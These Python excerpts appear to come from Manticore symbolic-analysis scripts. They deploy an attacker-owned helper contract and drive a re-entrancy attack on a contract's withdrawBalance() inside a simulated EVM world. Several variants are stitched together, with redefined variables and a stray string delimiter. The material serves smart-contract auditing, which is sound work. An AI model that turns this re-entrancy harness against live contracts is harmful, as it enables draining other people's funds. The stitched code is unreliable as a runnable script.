# Concrete re-entrancy check: deploy the attacker-owned helper contract and
# drive it against the contract under test inside the analysis world.
# NOTE(review): `m`, `ABI`, the two source strings and the user/attacker/
# contract accounts are defined before this excerpt; `m` is presumably the
# Manticore EVM instance.
# print(...) with one parenthesised argument behaves the same under the
# Python 2 print statement and the Python 3 print function.
exploit_account = m.solidity_create_contract(exploit_source_code,
                                             owner=attacker_account)

print("[+] Setup the exploit")
# Point the helper at the contract being audited.  set_reentry_reps(2)
# presumably bounds how often its callback re-enters -- confirm against
# exploit_source_code, which is outside this view.
exploit_account.set_vulnerable_contract(contract_account)
exploit_account.set_reentry_reps(2)

print("[+] Setting attack string")
# Earlier hand-assembled call data, kept for reference:
#'\x9d\x15\xfd\x17'+pack_msb(32)+pack_msb(4)+'\x5f\xd8\xc7\x10',
# The re-entry call data is the ABI selector of withdrawBalance().
reentry_string = ABI.function_selector('withdrawBalance()')
exploit_account.set_reentry_attack_string(reentry_string)

# Baseline balances, recorded before any deposit so later output can be
# compared against them.
print("[+] Initial world state")
for _fmt, _acct in (
        (" attacker_account %x balance: %d", attacker_account),
        (" exploit_account %x balance: %d", exploit_account),
        (" user_account %x balance: %d", user_account),
        (" contract_account %x balance: %d", contract_account)):
    print(_fmt % (_acct, m.get_balance(_acct)))

#User deposits all in contract
print("[+] user deposited some.")
contract_account.addToBalance(value=100000000000000000)

# The second deposit goes through the helper's proxycall, presumably so the
# contract under test credits the helper contract rather than the attacker's
# own account.
# NOTE(review): the message says "small amount", but the value is the same
# 10**17 the user deposited.
# NOTE(review): when auditing the result, an exploit_account balance above
# its deposit would indicate that withdrawBalance() pays out before updating
# its ledger; the remedy is in the contract (update state before the
# external call), not in this harness.
print("[+] Let attacker deposit some small amount using exploit")
exploit_account.proxycall(ABI.function_selector('addToBalance()'),
                          value=100000000000000000)
# Symbolic re-entrancy check: build the world (two funded accounts, the
# contract under test and the attacker's helper contract), then leave the
# helper's callback data symbolic.
# NOTE(review): `m` and the two source strings are defined before this
# excerpt; `m` is presumably the Manticore EVM instance.

# Both externally owned accounts start with the same balance (10**17).
user_account = m.create_account(balance=100000000000000000)
attacker_account = m.create_account(balance=100000000000000000)

# Contract under test is owned by the user; the helper by the attacker.
contract_account = m.solidity_create_contract(
    contract_source_code, owner=user_account)  # Not payable
exploit_account = m.solidity_create_contract(
    exploit_source_code, owner=attacker_account)

# The deposit equals the user's whole starting balance.
print("[+] user deposited some.")
contract_account.addToBalance(value=100000000000000000)

# Printed after the user's deposit, so this "initial" state already
# includes the deposited funds in the contract's balance.
print("[+] Initial world state")
for _fmt, _acct in (
        (" attacker_account %x balance: %d", attacker_account),
        (" exploit_account %x balance: %d", exploit_account),
        (" user_account %x balance: %d", user_account),
        (" contract_account %x balance: %d", contract_account)):
    print(_fmt % (_acct.address, m.get_balance(_acct.address)))

print("[+] Set up the exploit")
exploit_account.set_vulnerable_contract(contract_account)

# set_reentry_reps(30) presumably caps the number of nested callbacks --
# confirm against exploit_source_code, which is outside this view.
print("\t Setting 30 reply reps")
exploit_account.set_reentry_reps(30)

# Four symbolic bytes (the width of an ABI function selector): the callback
# data is left unconstrained so the engine explores it instead of testing
# one hand-picked selector.
# NOTE(review): a path that ends with exploit_account holding more than it
# put in would mean the contract under test pays out before updating its
# ledger; the remedy is in that contract, not in this harness.
print("\t Setting reply string")
exploit_account.set_reentry_attack_string(m.make_symbolic_buffer(4))
'''
# The quotes above close a string literal that begins before this excerpt;
# the code is left untouched for that reason and only comments are added.
# Python 2 variant (print statements) of a symbolic re-entrancy check.
# NOTE(review): `m` and the two source strings are defined before this
# excerpt; `m` is presumably the Manticore EVM instance.

# Initialize user and contracts: both externally owned accounts start with
# the same balance (10**17).
user_account = m.create_account(balance=100000000000000000)
attacker_account = m.create_account(balance=100000000000000000)
# Contract under test, owned by the user.
contract_account = m.solidity_create_contract(contract_source_code, owner=user_account) #Not payable
# Helper contract, owned by the attacker account.
exploit_account = m.solidity_create_contract(exploit_source_code, owner=attacker_account)

# User deposits all in contract: the value equals the user's starting balance.
print "[+] user deposited some."
contract_account.addToBalance(value=100000000000000000)

# Printed after the user's deposit, so this "initial" state already
# includes the deposited funds in the contract's balance.
print "[+] Initial world state"
print " attacker_account %x balance: %d"% (attacker_account, m.get_balance(attacker_account))
print " exploit_account %x balance: %d"% (exploit_account, m.get_balance(exploit_account))
print " user_account %x balance: %d"% (user_account, m.get_balance(user_account))
print " contract_account %x balance: %d"% (contract_account, m.get_balance(contract_account))

# Point the helper at the contract being audited.
print "[+] Setup the exploit"
exploit_account.set_vulnerable_contract(contract_account)
# set_reentry_reps(30) presumably caps the number of nested callbacks --
# confirm against exploit_source_code, which is outside this view.
print "\t Setting 30 reply reps"
exploit_account.set_reentry_reps(30)
# m.SByte(4) is presumably a 4-byte symbolic value (the width of an ABI
# function selector), leaving the callback data for the engine to explore
# -- TODO confirm against the Manticore version in use.
print "\t Setting reply string"
exploit_account.set_reentry_attack_string(m.SByte(4))